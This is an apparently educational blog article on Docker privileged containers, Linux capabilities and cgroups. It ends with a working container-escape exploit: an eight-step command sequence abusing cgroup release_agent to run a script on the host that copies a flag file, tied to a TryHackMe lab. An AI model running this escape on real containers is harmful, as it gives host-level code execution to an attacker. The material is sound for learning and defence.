Table of Contents:
Dive Into the Deep
Welcome to the sixth article of my technical articles series! Today, we're diving into the exciting world of Docker containers. Get ready to uncover a method for leveraging exploitation against Docker containers. I’ll assume you’ve already got a basic of the fundamental concepts of Docker, so let’s roll up our sleeves and get started!
Exploring the setcap
Command
The setcap
command is used in Linux to set file capabilities, which allow you to grant specific privileges to executables. Unlike traditional root permissions
, file capabilities enable a more granular
approach, assigning only the necessary privileges to a process. This enhances security by reducing the need to grant full root access.
For example, sudo setcap 'cap_net_bind_service=+ep' /path/to/myapp
→ allows the executable myapp
to bind to ports
below 1024
without needing full root permissions.
So At its core, Linux capabilities
are subset of root permissions
given to processes or executables within the Linux kernel
. These privileges allow for a more granular assignment of permissions instead of just granting them all at once.
Exploring Docker Modes
Docker containers
can operate in two distinct modes: User (Normal) mode
and Privileged mode
, each with varying levels of access and control, Two different modes in action
and the level of access
each mode has to the host.
Containers 1
run in user/normal mode
, interacting with the OS through the Docker Engine
, While Container 2
runs in privileged mode
, bypassing the Docker Engine and directly communicating with the OS. Privileged containers have more direct access to system resources.
Docker Access: Groups, Privileges, and the Mighty --privileged
Flag!
- A normal user needs to be in the
docker
group to run Docker commands withoutsudo
. - Adding the user to the
docker
group allows them to execute Docker commands likedocker run <image>
without requiring elevated privileges. - Privileged Mode used Command:
docker run --privileged -it your_image_name
- The
--privileged
flag grants additional capabilities to containers (e.g., hardware access, system-level features). - Root or
sudo
privileges are still required to use the--privileged
flag, even if the user is in thedocker
group. - A user in the
docker
group withoutsudo
cannot run commands with the-privileged
flag.
If a container has privileged access to the operating system, it can execute commands as root on the host. Using utilities like capsh
from the libcap2-bin
package, we can list the container's capabilities to understand the syscalls
it can make and potential exploitation mechanisms.
The Mysteries of Syscalls
We need to understand what syscalls
and cgroups
are before starting the exploitation phase, so let’s begin explaining what is syscall
syscall (system call)
is a way for programs
to interact
with the operating system kernel
. It allows user-level applications
to request
services such as file
operations, process
control, and network communication
from the kernel
Example of how to use a system call
in a Linux shell
to list files in a directory:
#!/bin/bash
# List files in the current directory
echo "Listing files in the current directory:"
ls
This script uses the ls
command to interact with the kernel and list files in the directory. It's a straightforward example of how user-level applications
can request services
from the kernel using system calls.
Demystifying the cgroup
Command
Control groups (cgroups
) in Linux manage
and limit
the resources that processes can use. They help control CPU
, memory
, and other resources to ensure the system runs efficiently.
Typical control group (cgroup
) directory might look like in a Linux system
/sys/fs/cgroup/
├── blkio
│ ├── blkio.throttle.io_serviced
│ ├── blkio.throttle.io_service_bytes
│ ├── cgroup.procs
│ ├── notify_on_release
│ ├── release_agent
│ └── tasks
├── cpu
│ ├── cgroup.procs
│ ├── cpu.cfs_period_us
│ ├── cpu.cfs_quota_us
│ ├── cpu.stat
│ ├── notify_on_release
│ ├── release_agent
│ └── tasks
├── cpuacct
│ ├── cgroup.procs
│ ├── cpuacct.usage
│ ├── cpuacct.stat
│ ├── notify_on_release
│ ├── release_agent
│ └── tasks
├── devices
│ ├── cgroup.procs
│ ├── devices.allow
│ ├── devices.deny
│ ├── notify_on_release
│ ├── release_agent
│ └── tasks
└── memory
├── cgroup.procs
├── memory.limit_in_bytes
├── memory.usage_in_bytes
├── notify_on_release
├── release_agent
└── tasks
Each subsystem (blkio
, cpu
, cpuacct
, devices
, memory
) represents a different resource controller and contains files that control various aspects of process resource usage within that cgroup
Taming the Beast By Editing cgroups
When you create a new cgroup directory
, it will automatically include certain files. For example, after creating the directory /sys/fs/cgroup/my_cgroup
, the directory will typically contain the following files by default:
/sys/fs/cgroup/my_cgroup
├── cgroup.procs
├── cpu.cfs_period_us
├── cpu.cfs_quota_us
├── notify_on_release
├── release_agent
└── tasks
Here's an example of setting the CPU quota
inside the cpu.cfs_quota_us
file:
mkdir /sys/fs/cgroup/my_cgroup # First, create the cgroup directory:
cd /sys/fs/cgroup/my_cgroup # Change to the new directory:
echo 50000 > cpu.cfs_quota_us
echo 100000 > cpu.cfs_period_us
Now we will explain some cgroup
Files and How They Work with Specific Commands
echo 1 > /tmp/cgrp/x/notify_on_release
The notify_on_release
file is used to notify the kernel when the cgroup
is released
→ meaning that the processes assigned
to that cgroup
have completed their execution or have been terminated, You write 1
to this file to enable the notification
.
echo "$host_path/exploit" > /tmp/cgrp/release_agent
The release_agent
file specifies a script or binary to be executed when the cgroup
is released
. So, when the cgroup
finishes, the kernel is first notified via notify_on_release
, and then it runs the script specified in release_agent
.
Only the process added to the cgroup
(echo \\$\\$ > /tmp/cgrp/x/cgroup.procs
) will be affected and will trigger the release_agent
when it exits.
Example of what might be written inside the cgroup.procs
file
12345
67890
11223
44556
The script targets
a specific process, not all
processes and only
the process that you add to the cgroup
will trigger the release agent upon exiting.
Checking Container Capabilities
Listing capabilities of a privileged Docker Container
:
semo@privilegedcontainer:~$ capsh --print
Current: = cap_chown, cap_sys_module, cap_sys_chroot, cap_sys_admin, cap_setgid, cap_setuid
In the example exploit below, we are going to use the mount syscall
(as allowed by the container's capabilities
) to mount the host's control groups into the container.
cap_sys_admin
: A broad capability that includes many administrative privileges, including the ability to mount and unmount filesystems.
Detailed Exploitation of Privileged Containers
The code snippet below is based upon (but a modified version of
) the Proof of Concept (PoC)
created by Trailofbits
, which details the inner workings of this exploit well.
1. mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
2. echo 1 > /tmp/cgrp/x/notify_on_release
3. semo_path=`sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab`
4. echo "$semo_path/exploit" > /tmp/cgrp/release_agent
5. echo '#!/bin/sh' > /exploit
6. echo "cat /home/semo/flag.txt > $semo_path/flag.txt" >> /exploit
7. chmod a+x /exploit
8. sh -c "echo \\$\\$ > /tmp/cgrp/x/cgroup.procs"
Exploitation Explanation
- Create a group using the Linux kernel to
manage and execute our exploit
. We'll usecgroups
to manage processes, and mount it to/tmp/cgrp
on the container as root. - To run our exploit, we'll notify the kernel by writing
1
to/tmp/cgrp/x/notify_on_release
, indicating it should execute our code when thecgroup
finishes. - Determine where the container's files are stored on the host and save this path as a variable.
- Echo the container's file location into
/exploit
and set it in therelease_agent
, which thecgroup
will execute upon release. - Create a
shell script
for our exploit on the host. - Add a
command to the script to copy the host's flag
into a file namedflag.txt
in thecontainer upon execution.
- Make the
/exploit
script executable. - This command writes the process ID (
PID
) of the current shell to thecgroup.procs
file located in/tmp/cgrp/x/
. It effectively adds the shell process to a control group (cgroup
) for resource management. - We create a
process
and store that into/tmp/cgrp/x/cgroup.procs
. When the process isreleased
, the contents will be executed.
Groovy Summary of Exploit Flow
- We will write process ID to
cgroup.procs
to include it in thecgroup
. - The process runs and exits naturally, making the
cgroup.procs
empty. notify_on_release
flag triggers the release agent when thecgroup
is empty.release_agent
runs the exploit script to perform the specified actions.
Note
: if you want topractice
on this vulnerability you can check outTryHackMe
Container Vulnerability Module → TryHackMe TryHackMe | Cyber Security Training
Byiee
I hope you found this article both useful and insightful. If you have any related suggestions or recommendations, feel free to connect with me on LinkedIn www.linkedin.com